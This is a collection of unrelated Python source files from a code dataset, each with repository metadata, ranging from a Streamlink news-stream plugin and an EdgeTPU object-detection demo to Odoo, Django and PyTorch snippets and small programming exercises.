refs/heads/master
| 2021-01-21T04:32:41.658823 | 2020-09-07T20:56:29 | 2020-09-07T20:56:29 | 101,915,967 | 6 | 4 |
BSD-2-Clause
| 2018-01-14T15:20:47 | 2017-08-30T18:31:47 |
Python
|
UTF-8
|
Python
| false | false | 2,149 |
py
|
import logging
import re
import json
from streamlink.plugin import Plugin
from streamlink.stream import HLSStream
log = logging.getLogger(__name__)
class NowNews(Plugin):
_url_re = re.compile(r"https?://news.now.com/home/live")
epg_re = re.compile(r'''epg.getEPG\("(\d+)"\);''')
api_url = "https://hkt-mobile-api.nowtv.now.com/09/1/getLiveURL"
backup_332_api = "https://d7lz7jwg8uwgn.cloudfront.net/apps_resource/news/live.json"
backup_332_stream = "https://d3i3yn6xwv1jpw.cloudfront.net/live/now332/playlist.m3u8"
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url) is not None
def _get_streams(self):
res = self.session.http.get(self.url)
m = self.epg_re.search(res.text)
channel_id = m and m.group(1)
if channel_id:
log.debug("Channel ID: {0}".format(channel_id))
if channel_id == "332":
# there is a special backup stream for channel 332
bk_res = self.session.http.get(self.backup_332_api)
bk_data = self.session.http.json(bk_res)
if bk_data and bk_data["backup"]:
log.info("Using backup stream for channel 332")
return HLSStream.parse_variant_playlist(self.session, self.backup_332_stream)
api_res = self.session.http.post(self.api_url,
headers={"Content-Type": 'application/json'},
data=json.dumps(dict(channelno=channel_id,
mode="prod",
audioCode="",
format="HLS",
callerReferenceNo="20140702122500")))
data = self.session.http.json(api_res)
for stream_url in data.get("asset", {}).get("hls", {}).get("adaptive", []):
return HLSStream.parse_variant_playlist(self.session, stream_url)
__plugin__ = NowNews
|
[
"[email protected]"
] | |
a5a17178600de20cbfc8a242569037482fae9caf
|
fccb5a43179906ddc3dd37849ac2a89cacf44981
|
/sphinx/source/exercises/solution/03_os_sub_req/ex5.py
|
653a604a993839e3b042cfc9ccaf6cd8eba8ff1f
|
[] |
no_license
|
YasmineOweda/spring2021
|
a48c1c4eaa525053a0e2188cf088124b004a35d8
|
072aadba20bfbc659427265fa228518fe4b09ff3
|
refs/heads/master
| 2023-04-29T10:20:14.132211 | 2021-05-11T09:07:40 | 2021-05-11T09:07:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 435 |
py
|
import os
#1
os.mkdir('os_exercises')
#2
os.chdir('os_exercises')
open('exercise.py', 'w')
#3
x = input('Please write something to the file: ')
with open('exercise.py', 'w') as f:
f.write(x)
#4
x = input('Please write something more to another file: ')
with open('exercise2.py', 'w') as f:
f.write(x)
#5
with open('exercise.py', 'r') as f1:
with open('exercise2.py', 'r' ) as f2:
print(f1.read() + f2.read())
|
[
"[email protected]"
] | |
db3b4d13adbd04eba6106f6e0d8559771deadcd5
|
61699048dc567cd3a814e5b987599dae175bed19
|
/Python/month01/day15/exercise02.py
|
ba4af22e18080c30f44bdc184166efdfe0b8e96a
|
[] |
no_license
|
Courage-GL/FileCode
|
1d4769556a0fe0b9ed0bd02485bb4b5a89c9830b
|
2d0caf3a422472604f073325c5c716ddd5945845
|
refs/heads/main
| 2022-12-31T17:20:59.245753 | 2020-10-27T01:42:50 | 2020-10-27T01:42:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 611 |
py
|
"""
Exercise 2: define a function that, given a birth date (year, month, day), calculates how many days you have lived.
Input: 2010 1 1
Output: From 2010-01-01 to today you have lived a total of 3910 days
"""
import time
def life_days(year, month, day):
# now minus birth time
# time_tuple = time.strptime("%d-%d-%d" % (year, month, day), "%Y-%m-%d")
time_tuple = (year, month, day, 0, 0, 0, 0, 0, 0)
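# time.mktime expects a 9-field struct_time-style tuple; the time-of-day and DST fields are zeroed here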
life_second = time.time() - \
time.mktime(time_tuple)
return life_second / 60 / 60 / 24
y = 1990
m = 9
d = 18
result = life_days(y, m, d)
print(f"从{y}年{m}月{d}日到现在总共活了{result:.0f}天")
|
[
"[email protected]"
] | |
ebce17fb0dd02ef5af320607dbcfad78bb6aec8c
|
dcd0fb6bdcb488dd2046778eb02edce8f4623b58
|
/object_follow_edgetpu/detect_standalone.py
|
7e196dbb4d1727616b1a5ec9f56384351df24223
|
[] |
no_license
|
openbsod/Adeept_AWR
|
12f2df24bfcf85d7965a425bb0078b2c858e807a
|
92ca5e7147a9cb44ad55f55a467371648dc76b3c
|
refs/heads/master
| 2023-04-09T07:06:35.772918 | 2021-04-15T21:20:40 | 2021-04-15T21:20:40 | 284,012,618 | 1 | 0 | null | 2020-07-31T10:46:50 | 2020-07-31T10:46:49 | null |
UTF-8
|
Python
| false | false | 4,801 |
py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Object detection demo.
This demo script requires a Raspberry Pi Camera and a pre-compiled model.
Get pre-compiled model from Coral website [1]
[1]: https://dl.google.com/coral/canned_models/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite
"""
from edgetpu.detection.engine import DetectionEngine
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
import numpy as np
import time
import io
import picamera
# https://github.com/waveform80/picamera/issues/383
def _monkey_patch_picamera():
original_send_buffer = picamera.mmalobj.MMALPortPool.send_buffer
def silent_send_buffer(zelf, *args, **kwargs):
try:
original_send_buffer(zelf, *args, **kwargs)
except picamera.exc.PiCameraMMALError as error:
if error.status != 14:
raise error
picamera.mmalobj.MMALPortPool.send_buffer = silent_send_buffer
# Read labels.txt file provided by Coral website
def _read_label_file(file_path):
with open(file_path, 'r', encoding="utf-8") as f:
lines = f.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
# Main loop
def main():
model_filename = "mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite"
label_filename = "coco_labels.txt"
engine = DetectionEngine(model_filename)
labels = _read_label_file(label_filename)
CAMERA_WIDTH = 640
CAMERA_HEIGHT = 480
fnt = ImageFont.load_default()
# To view preview on VNC,
# https://raspberrypi.stackexchange.com/a/74390
with picamera.PiCamera() as camera:
_monkey_patch_picamera()
camera.resolution = (CAMERA_WIDTH, CAMERA_HEIGHT)
camera.framerate = 15
camera.rotation = 180
_, width, height, channels = engine.get_input_tensor_shape()
print("{}, {}".format(width, height))
overlay_renderer = None
camera.start_preview()
try:
stream = io.BytesIO()
for foo in camera.capture_continuous(stream,
format='rgb',
use_video_port=True):
# Make Image object from camera stream
stream.truncate()
stream.seek(0)
input = np.frombuffer(stream.getvalue(), dtype=np.uint8)
input = input.reshape((CAMERA_HEIGHT, CAMERA_WIDTH, 3))
image = Image.fromarray(input)
# image.save("out.jpg")
# Make overlay image plane
img = Image.new('RGBA',
(CAMERA_WIDTH, CAMERA_HEIGHT),
(255, 0, 0, 0))
draw = ImageDraw.Draw(img)
# Run detection
start_ms = time.time()
results = engine.DetectWithImage(image,
threshold=0.2, top_k=10)
elapsed_ms = (time.time() - start_ms)*1000.0
if results:
for obj in results:
box = obj.bounding_box.flatten().tolist()
box[0] *= CAMERA_WIDTH
box[1] *= CAMERA_HEIGHT
box[2] *= CAMERA_WIDTH
box[3] *= CAMERA_HEIGHT
# print(box)
# print(labels[obj.label_id])
draw.rectangle(box, outline='red')
draw.text((box[0], box[1]-10), labels[obj.label_id],
font=fnt, fill="red")
camera.annotate_text = "{0:.2f}ms".format(elapsed_ms)
if not overlay_renderer:
overlay_renderer = camera.add_overlay(
img.tobytes(),
size=(CAMERA_WIDTH, CAMERA_HEIGHT), layer=4, alpha=255)
else:
overlay_renderer.update(img.tobytes())
finally:
if overlay_renderer:
camera.remove_overlay(overlay_renderer)
camera.stop_preview()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
a76bbe862fc2f943b5866b00388228264612f33d
|
6d4af63e07a137d382ef61afe8276f7470b7af59
|
/wsgistate/__init__.py
|
742cd2a8b2a8e916a3427188ed7f1c260ff1b2b1
|
[] |
no_license
|
Cromlech/wsgistate
|
142c7016c74fc28e6c56368f018bf113c379118c
|
d730ee47a4a43efbd20bcb9623e76bedeeb8c62b
|
refs/heads/master
| 2023-04-11T14:10:20.522520 | 2023-04-11T10:06:10 | 2023-04-11T10:06:10 | 15,806,829 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,085 |
py
|
# Copyright (c) 2005 Allan Saddi <[email protected]>
# Copyright (c) 2005, the Lawrence Journal-World
# Copyright (c) 2006 L. C. Rees
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of Django nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
'''Base Cache class'''
__all__ = ['BaseCache', 'db', 'file', 'memory', 'memcached',
'session', 'simple', 'cache']
def synchronized(func):
'''Decorator to lock and unlock a method (Phillip J. Eby).
@param func Method to decorate
'''
def wrapper(self, *__args, **__kw):
self._lock.acquire()
try:
return func(self, *__args, **__kw)
finally:
self._lock.release()
wrapper.__name__ = func.__name__
wrapper.__dict__ = func.__dict__
wrapper.__doc__ = func.__doc__
return wrapper
class BaseCache(object):
'''Base Cache class.'''
def __init__(self, *a, **kw):
super(BaseCache, self).__init__()
timeout = kw.get('timeout', 300)
try:
timeout = int(timeout)
except (ValueError, TypeError):
timeout = 300
self.timeout = timeout
def __getitem__(self, key):
'''Fetch a given key from the cache.'''
return self.get(key)
def __setitem__(self, key, value):
'''Set a value in the cache. '''
self.set(key, value)
def __delitem__(self, key):
'''Delete a key from the cache.'''
self.delete(key)
def __contains__(self, key):
'''Tell if a given key is in the cache.'''
return self.get(key) is not None
def get(self, key, default=None):
'''Fetch a given key from the cache. If the key does not exist, return
default, which itself defaults to None.
@param key Keyword of item in cache.
@param default Default value (default: None)
'''
raise NotImplementedError()
def set(self, key, value):
'''Set a value in the cache.
@param key Keyword of item in cache.
@param value Value to be inserted in cache.
'''
raise NotImplementedError()
def delete(self, key):
'''Delete a key from the cache, failing silently.
@param key Keyword of item in cache.
'''
raise NotImplementedError()
def get_many(self, keys):
'''Fetch a bunch of keys from the cache. Returns a dict mapping each
key in keys to its value. If the given key is missing, it will be
missing from the response dict.
@param keys Keywords of items in cache.
'''
d = dict()
for k in keys:
val = self.get(k)
if val is not None:
d[k] = val
return d
|
[
"[email protected]"
] | |
a658a0212b71fb6327314f0662b6143017559bc1
|
df2cbe914f463ad050d7ed26194424afbe3a0a52
|
/addons/snailmail/models/mail_notification.py
|
a368c0a778338b68f037181c93c3d78bffc3f691
|
[
"Apache-2.0"
] |
permissive
|
SHIVJITH/Odoo_Machine_Test
|
019ed339e995be980606a2d87a63312ddc18e706
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
refs/heads/main
| 2023-07-16T16:23:14.300656 | 2021-08-29T11:48:36 | 2021-08-29T11:48:36 | 401,010,175 | 0 | 0 |
Apache-2.0
| 2021-08-29T10:13:58 | 2021-08-29T10:13:58 | null |
UTF-8
|
Python
| false | false | 719 |
py
|
# -*- coding: utf-8 -*-
from odoo import fields, models
class Notification(models.Model):
_inherit = 'mail.notification'
notification_type = fields.Selection(selection_add=[('snail', 'Snailmail')], ondelete={'snail': 'cascade'})
letter_id = fields.Many2one('snailmail.letter', string="Snailmail Letter", index=True, ondelete='cascade')
failure_type = fields.Selection(selection_add=[
('sn_credit', "Snailmail Credit Error"),
('sn_trial', "Snailmail Trial Error"),
('sn_price', "Snailmail No Price Available"),
('sn_fields', "Snailmail Missing Required Fields"),
('sn_format', "Snailmail Format Error"),
('sn_error', "Snailmail Unknown Error"),
])
|
[
"[email protected]"
] | |
de8b449316abbe86696e3641635d94af6d290c5d
|
8acffb8c4ddca5bfef910e58d3faa0e4de83fce8
|
/ml-flask/Lib/site-packages/caffe2/python/operator_test/stats_put_ops_test.py
|
2ce56248c5dd0116931f91de9b4b556dd881e73b
|
[
"MIT"
] |
permissive
|
YaminiHP/SimilitudeApp
|
8cbde52caec3c19d5fa73508fc005f38f79b8418
|
005c59894d8788c97be16ec420c0a43aaec99b80
|
refs/heads/master
| 2023-06-27T00:03:00.404080 | 2021-07-25T17:51:27 | 2021-07-25T17:51:27 | 389,390,951 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:86a74bb87f96bd8ebf2fa9ae72729c5cbe121a32edc1fb034496e084703631b3
size 6596
|
[
"[email protected]"
] | |
a35e6a756f615aca80c4b91a8b264a5aa0cd6d0e
|
9cd00edd008ce38ea3127f090b6867a91fe7193d
|
/src/plot_Qle_at_all_events_above_Tthreh.py
|
382993ac07bd63823ff8cd12124f714a8056199b
|
[] |
no_license
|
shaoxiuma/heatwave_coupling
|
c5a2a2bba53351597f4cb60ecb446bfb9629812f
|
459f6bc72402b5dd3edf49bc3b9be380b5f54705
|
refs/heads/master
| 2021-09-13T06:50:48.733659 | 2018-04-26T06:09:54 | 2018-04-26T06:09:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,338 |
py
|
#!/usr/bin/env python
"""
For each of the OzFlux/FLUXNET2015 sites, plot the TXx and T-4 days
Qle and bowen ratio
That's all folks.
"""
__author__ = "Martin De Kauwe"
__version__ = "1.0 (20.04.2018)"
__email__ = "[email protected]"
import os
import sys
import glob
import netCDF4 as nc
import numpy as np
import xarray as xr
import matplotlib.pyplot as plt
import pandas as pd
import re
import constants as c
def main(fname):
plot_dir = "plots"
if not os.path.exists(plot_dir):
os.makedirs(plot_dir)
df = pd.read_csv(fname)
df = df[df.pft == "EBF"]
df = df[~np.isnan(df.temp)]
#width = 12.0
#height = width / 1.618
#print(width, height)
#sys.exit()
width = 14
height = 10
fig = plt.figure(figsize=(width, height))
fig.subplots_adjust(hspace=0.05)
fig.subplots_adjust(wspace=0.05)
plt.rcParams['text.usetex'] = False
plt.rcParams['font.family'] = "sans-serif"
plt.rcParams['font.sans-serif'] = "Helvetica"
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['font.size'] = 14
plt.rcParams['legend.fontsize'] = 10
plt.rcParams['xtick.labelsize'] = 14
plt.rcParams['ytick.labelsize'] = 14
count = 0
sites = np.unique(df.site)
for site in sites:
site_name = re.sub(r"(\w)([A-Z])", r"\1 \2", site)
ax = fig.add_subplot(3,3,1+count)
df_site = df[df.site == site]
events = int(len(df_site)/4)
cnt = 0
for e in range(0, events):
from scipy import stats
x = df_site["temp"][cnt:cnt+4]
y = df_site["Qle"][cnt:cnt+4]
slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)
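# events with a significant positive Qle-temperature slope are drawn in colour on top; non-significant positive slopes in light grey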
if slope > 0.0 and p_value <= 0.05:
ax.plot(df_site["temp"][cnt:cnt+4], df_site["Qle"][cnt:cnt+4],
label=site, ls="-", marker="o", zorder=100)
elif slope > 0.0 and p_value > 0.05:
ax.plot(df_site["temp"][cnt:cnt+4], df_site["Qle"][cnt:cnt+4],
label=site, ls="-", marker="o", color="lightgrey",
zorder=1)
cnt += 4
if count == 0:
ax.set_ylabel("Qle (W m$^{-2}$)", position=(0.5, 0.0))
if count == 4:
#ax.set_xlabel('Temperature ($^\circ$C)', position=(1.0, 0.5))
ax.set_xlabel('Temperature ($^\circ$C)')
if count < 3:
plt.setp(ax.get_xticklabels(), visible=False)
if count != 0 and count != 3:
plt.setp(ax.get_yticklabels(), visible=False)
props = dict(boxstyle='round', facecolor='white', alpha=1.0,
ec="white")
ax.text(0.04, 0.95, site_name,
transform=ax.transAxes, fontsize=14, verticalalignment='top',
bbox=props)
from matplotlib.ticker import MaxNLocator
ax.yaxis.set_major_locator(MaxNLocator(4))
ax.set_ylim(0, 280)
ax.set_xlim(15, 50)
count += 1
ofdir = "/Users/mdekauwe/Dropbox/fluxnet_heatwaves_paper/figures/figs"
fig.savefig(os.path.join(ofdir, "all_events.pdf"),
bbox_inches='tight', pad_inches=0.1)
#plt.show()
if __name__ == "__main__":
data_dir = "outputs/"
fname = "ozflux_all_events.csv"
fname = os.path.join(data_dir, fname)
main(fname)
|
[
"[email protected]"
] | |
298bdb7986c7ce282903098e71efc3e61ebde167
|
4b0c57dddf8bd98c021e0967b5d94563d15372e1
|
/run_MatrixElement/test/emptyPSets/emptyPSet_qqH125_cfg.py
|
1925d9eb5134f84222300788d85f42237860a66f
|
[] |
no_license
|
aperloff/TAMUWW
|
fea6ed0066f3f2cef4d44c525ee843c6234460ba
|
c18e4b7822076bf74ee919509a6bd1f3cf780e11
|
refs/heads/master
| 2021-01-21T14:12:34.813887 | 2018-07-23T04:59:40 | 2018-07-23T04:59:40 | 10,922,954 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 896 |
py
|
import FWCore.ParameterSet.Config as cms
import os
#!
#! PROCESS
#!
process = cms.Process("MatrixElementProcess")
#!
#! SERVICES
#!
#process.load('Configuration.StandardSequences.Services_cff')
process.load('FWCore.MessageLogger.MessageLogger_cfi')
process.MessageLogger.cerr.FwkReport.reportEvery = 5000
process.load('CommonTools.UtilAlgos.TFileService_cfi')
process.TFileService.fileName=cms.string('qqH125.root')
#!
#! INPUT
#!
inputFiles = cms.untracked.vstring(
'root://cmsxrootd.fnal.gov//store/user/aperloff/MatrixElement/Summer12ME8TeV/MEInput/qqH125.root'
)
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(10))
process.source = cms.Source("PoolSource",
skipEvents = cms.untracked.uint32(0),
fileNames = inputFiles )
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
|
[
"[email protected]"
] | |
afbde151e2e1473b1d6aa573579299dc0eb3ce8d
|
18c03a43ce50ee0129f9f45ada1bdaa2ff4f5774
|
/epistasis/__init__.py
|
4f9536d756aca5c653b3e69bbff59937aa2ff678
|
[
"Unlicense"
] |
permissive
|
harmsm/epistasis
|
acf7b5678b328527b2c0063f81d512fcbcd78ce1
|
f098700c15dbd93977d797a1a1708b4cfb6037b3
|
refs/heads/master
| 2022-04-30T13:09:49.106984 | 2022-03-19T05:29:37 | 2022-03-19T05:29:37 | 150,969,948 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,105 |
py
|
"""\
A Python API for modeling statistical, high-order epistasis in genotype-phenotype maps.
This library provides methods for:
1. Decomposing genotype-phenotype maps into high-order epistatic interactions
2. Finding nonlinear scales in the genotype-phenotype map
3. Calculating the contributions of different epistatic orders
4. Estimating the uncertainty of epistatic coefficients and
5. Interpreting the evolutionary importance of high-order interactions.
For more information about the epistasis models in this library, see our Genetics paper:
`Sailer, Z. R., & Harms, M. J. (2017). "Detecting High-Order Epistasis in Nonlinear Genotype-Phenotype Maps." Genetics, 205(3), 1079-1088.`_
.. _`Sailer, Z. R., & Harms, M. J. (2017). "Detecting High-Order Epistasis in Nonlinear Genotype-Phenotype Maps." Genetics, 205(3), 1079-1088.`: http://www.genetics.org/content/205/3/1079
Currently, this package works only as an API and there is no command-line
interface. Instead, we encourage you to use this package inside `Jupyter notebooks`_.
"""
from .__version__ import __version__
|
[
"[email protected]"
] | |
d8e42f2ce2432b336adb63018b3a51e93aacef6d
|
1c0542cef2ac6a5fb691602887236bf70f9bf71f
|
/speed_test_sar/sfsi_speed/mmcls/models/backbones/utils/gumbel_sigmoid.py
|
6610270f02c80a91e8e61cd013f8b7dff68c6ba3
|
[
"Apache-2.0"
] |
permissive
|
yizenghan/sarNet
|
683f45620013f906cb8a550713e786787074a8ae
|
d47a6e243677811b259a753233fbbaf86d2c9c97
|
refs/heads/master
| 2023-07-16T02:09:11.913765 | 2021-08-30T02:04:02 | 2021-08-30T02:04:02 | 299,276,627 | 11 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,723 |
py
|
import torch
from torch import nn
class GumbelSigmoid(nn.Module):
def __init__(self, max_T, decay_alpha, decay_method='exp', start_iter=0):
super(GumbelSigmoid, self).__init__()
self.max_T = max_T
self.cur_T = max_T
self.step = 0
self.decay_alpha = decay_alpha
self.decay_method = decay_method
self.softmax = nn.Softmax(dim=1)
self.p_value = 1e-8
# self.cur_T = (self.decay_alpha ** start_iter) * self.cur_T
assert self.decay_method in ['exp', 'step', 'cosine']
def forward(self, x):
# Shape <x> : [N, C, H, W]
# Shape <r> : [N, C, H, W]
r = 1 - x
x = (x + self.p_value).log()
r = (r + self.p_value).log()
# Generate Noise
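# two successive -log transforms turn uniform samples into Gumbel(0, 1) noise: g = -log(-log(u))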
x_N = torch.rand_like(x)
r_N = torch.rand_like(r)
x_N = -1 * (x_N + self.p_value).log()
r_N = -1 * (r_N + self.p_value).log()
x_N = -1 * (x_N + self.p_value).log()
r_N = -1 * (r_N + self.p_value).log()
# Get Final Distribution
x = x + x_N
x = x / (self.cur_T + self.p_value)
r = r + r_N
r = r / (self.cur_T + self.p_value)
x = torch.cat((x, r), dim=1)
x = self.softmax(x)
x = x[:, [0], :, :]
if self.training:
self.cur_T = self.cur_T * self.decay_alpha
# if self.cur_T < 0.5 or not self.training:
# print('cur_T:{0}'.format(self.cur_T))
# self.step += 1
# if self.step % 50 == 0:
# print('cur_T:{0}'.format(self.cur_T))
#
return x
if __name__ == '__main__':
pass
# ToDo: Test Code Here.
# _test_T = 0.6
# Block = GumbelSigmoid(_test_T, 1.0)
|
[
"[email protected]"
] | |
d8e6d6bc745881e200737675ec2cd28b084d364d
|
68c003a526414fef3c23ad591982f1113ca8a72c
|
/api/urls.py
|
6287d8ae58d870352565ce7f626f9a3aa7037130
|
[] |
no_license
|
pawanpaudel93/NepAmbulance
|
9d99ef3a3592b3a17091889d9db32aa952974400
|
b07dba43926c3f5a350b0acd75ac90b4842e3e32
|
refs/heads/master
| 2020-06-14T08:59:03.523102 | 2020-01-07T09:05:03 | 2020-01-07T09:05:03 | 194,965,063 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 761 |
py
|
from django.contrib import admin
from django.urls import path
from .views import ListCreateAmbulance, RetrieveUpdateDeleteAmbulance, ListDistrict, ListProvince
urlpatterns = [
path('ambulance/<int:province>/<slug:district>/<slug:city>/<int:ward>/', ListCreateAmbulance.as_view(), name="list-create-api"),
path('ambulance/<int:province>/<slug:district>/<slug:city>/<int:ward>/<int:pk>/', RetrieveUpdateDeleteAmbulance.as_view()),
# path('get/wards/<slug:city>/', ListWard.as_view(), name="get-wards"),
# path('get/cities/<slug:district>/', ListCity.as_view(), name='get-cities'),
path('get/districts/<slug:province>/', ListDistrict.as_view(), name='get-districts'),
path('get/provinces/', ListProvince.as_view(), name='get-provinces'),
]
|
[
"[email protected]"
] | |
e9a1e970d4704ef0445f93aed0cd5162806488f7
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03273/s702731643.py
|
a626a36c61e3c295dfc6c90d75e2a4adb265c98f
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 745 |
py
|
from collections import defaultdict
import itertools
import copy
def readInt():
return int(input())
def readInts():
return list(map(int, input().split()))
def readChar():
return input()
def readChars():
return input().split()
def p(arr,b="\n",e="\n"):
print(b,end="")
for i in arr:
for j in i:
print(j,end="")
print()
print(e,end="")
h,w = readInts()
a = [list(input()) for i in range(h)]
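# delete every row that contains no '#' (iterate bottom-up so indices stay valid while deleting)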
for i in range(h-1,-1,-1):
boo = 1
for j in range(w-1,-1,-1):
if a[i][j]=="#":
boo = 0
if boo==1:
del a[i]
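# likewise delete every column that contains no '#'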
for i in range(len(a[0])-1,-1,-1):
boo = 1
for j in range(len(a)-1,-1,-1):
if a[j][i]=="#":
boo = 0
if boo==1:
for j in range(len(a)-1,-1,-1):
del a[j][i]
p(a,b="",e="")
|
[
"[email protected]"
] | |
98f76ec619a2e488aa99de17c4447d474c1cb2e1
|
3f6c16ea158a8fb4318b8f069156f1c8d5cff576
|
/.PyCharm2019.1/system/python_stubs/-1046095393/atexit.py
|
3b4fb40c097ce9444aa1ae283f0da5efbfc50ffd
|
[] |
no_license
|
sarthak-patidar/dotfiles
|
08494170d2c0fedc0bbe719cc7c60263ce6fd095
|
b62cd46f3491fd3f50c704f0255730af682d1f80
|
refs/heads/master
| 2020-06-28T23:42:17.236273 | 2019-10-01T13:56:27 | 2019-10-01T13:56:27 | 200,369,900 | 0 | 0 | null | 2019-08-03T12:56:33 | 2019-08-03T11:53:29 |
Shell
|
UTF-8
|
Python
| false | false | 4,738 |
py
|
# encoding: utf-8
# module atexit
# from (built-in)
# by generator 1.147
"""
allow programmer to define multiple exit functions to be executed upon normal program termination.
Two public functions, register and unregister, are defined.
"""
# no imports
# functions
def register(func, *args, **kwargs): # real signature unknown; restored from __doc__
"""
register(func, *args, **kwargs) -> func
Register a function to be executed upon normal program termination
func - function to be called at exit
args - optional arguments to pass to func
kwargs - optional keyword arguments to pass to func
func is returned to facilitate usage as a decorator.
"""
pass
def unregister(func): # real signature unknown; restored from __doc__
"""
unregister(func) -> None
Unregister an exit function which was previously registered using
atexit.register
func - function to be unregistered
"""
pass
def _clear(): # real signature unknown; restored from __doc__
"""
_clear() -> None
Clear the list of previously registered exit functions.
"""
pass
def _ncallbacks(): # real signature unknown; restored from __doc__
"""
_ncallbacks() -> int
Return the number of registered exit functions.
"""
return 0
def _run_exitfuncs(): # real signature unknown; restored from __doc__
"""
_run_exitfuncs() -> None
Run all registered exit functions.
"""
pass
# classes
class __loader__(object):
"""
Meta path import for built-in modules.
All methods are either class or static methods to avoid the need to
instantiate the class.
"""
@classmethod
def create_module(cls, *args, **kwargs): # real signature unknown
""" Create a built-in module """
pass
@classmethod
def exec_module(cls, *args, **kwargs): # real signature unknown
""" Exec a built-in module """
pass
@classmethod
def find_module(cls, *args, **kwargs): # real signature unknown
"""
Find the built-in module.
If 'path' is ever specified then the search is considered a failure.
This method is deprecated. Use find_spec() instead.
"""
pass
@classmethod
def find_spec(cls, *args, **kwargs): # real signature unknown
pass
@classmethod
def get_code(cls, *args, **kwargs): # real signature unknown
""" Return None as built-in modules do not have code objects. """
pass
@classmethod
def get_source(cls, *args, **kwargs): # real signature unknown
""" Return None as built-in modules do not have source code. """
pass
@classmethod
def is_package(cls, *args, **kwargs): # real signature unknown
""" Return False as built-in modules are never packages. """
pass
@classmethod
def load_module(cls, *args, **kwargs): # real signature unknown
"""
Load the specified module into sys.modules and return it.
This method is deprecated. Use loader.exec_module instead.
"""
pass
def module_repr(module): # reliably restored by inspect
"""
Return repr for the module.
The method is deprecated. The import machinery does the job itself.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
__dict__ = None # (!) real value is "mappingproxy({'__module__': '_frozen_importlib', '__doc__': 'Meta path import for built-in modules.\\n\\n All methods are either class or static methods to avoid the need to\\n instantiate the class.\\n\\n ', 'module_repr': <staticmethod object at 0x7f1f2a7150f0>, 'find_spec': <classmethod object at 0x7f1f2a715128>, 'find_module': <classmethod object at 0x7f1f2a715160>, 'create_module': <classmethod object at 0x7f1f2a715198>, 'exec_module': <classmethod object at 0x7f1f2a7151d0>, 'get_code': <classmethod object at 0x7f1f2a715240>, 'get_source': <classmethod object at 0x7f1f2a7152b0>, 'is_package': <classmethod object at 0x7f1f2a715320>, 'load_module': <classmethod object at 0x7f1f2a715358>, '__dict__': <attribute '__dict__' of 'BuiltinImporter' objects>, '__weakref__': <attribute '__weakref__' of 'BuiltinImporter' objects>})"
# variables with complex values
__spec__ = None # (!) real value is "ModuleSpec(name='atexit', loader=<class '_frozen_importlib.BuiltinImporter'>, origin='built-in')"
|
[
"[email protected]"
] | |
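The stub above only records signatures; a minimal, runnable illustration of the two public functions it documents (standard-library behaviour, shown here as a sketch):
import atexit
@atexit.register                # register() returns func, so it doubles as a decorator
def goodbye():
    print("normal interpreter shutdown")
def flush_logs():
    print("flushing logs")
atexit.register(flush_logs)
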